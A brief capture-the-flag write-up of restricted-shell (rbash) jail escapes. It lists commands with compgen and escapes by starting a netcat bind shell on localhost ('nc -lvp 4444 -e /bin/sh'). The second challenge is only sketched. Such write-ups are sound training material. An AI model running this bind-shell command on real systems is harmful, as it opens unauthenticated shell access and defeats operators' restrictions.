jail
rbash warmup
Solved By : thewhiteh4t
we can use compgen
to check for available commands
compgen -c
another way is to use echo
now the known way of escaping with nc
is by getting a shell on our “attacker” box but in this challenge we are not allowed to connect to remote machines so we are left with localhost
actually this is more easy…
nc -lvp 4444 -e /bin/sh &
now we can connect to it !
rbash yet another calculator
Solved By : thewhiteh4t
challenge mentions that filename has been changed this time but it is in the same working directory
so we can again use echo to check the file name
just google “echo read file”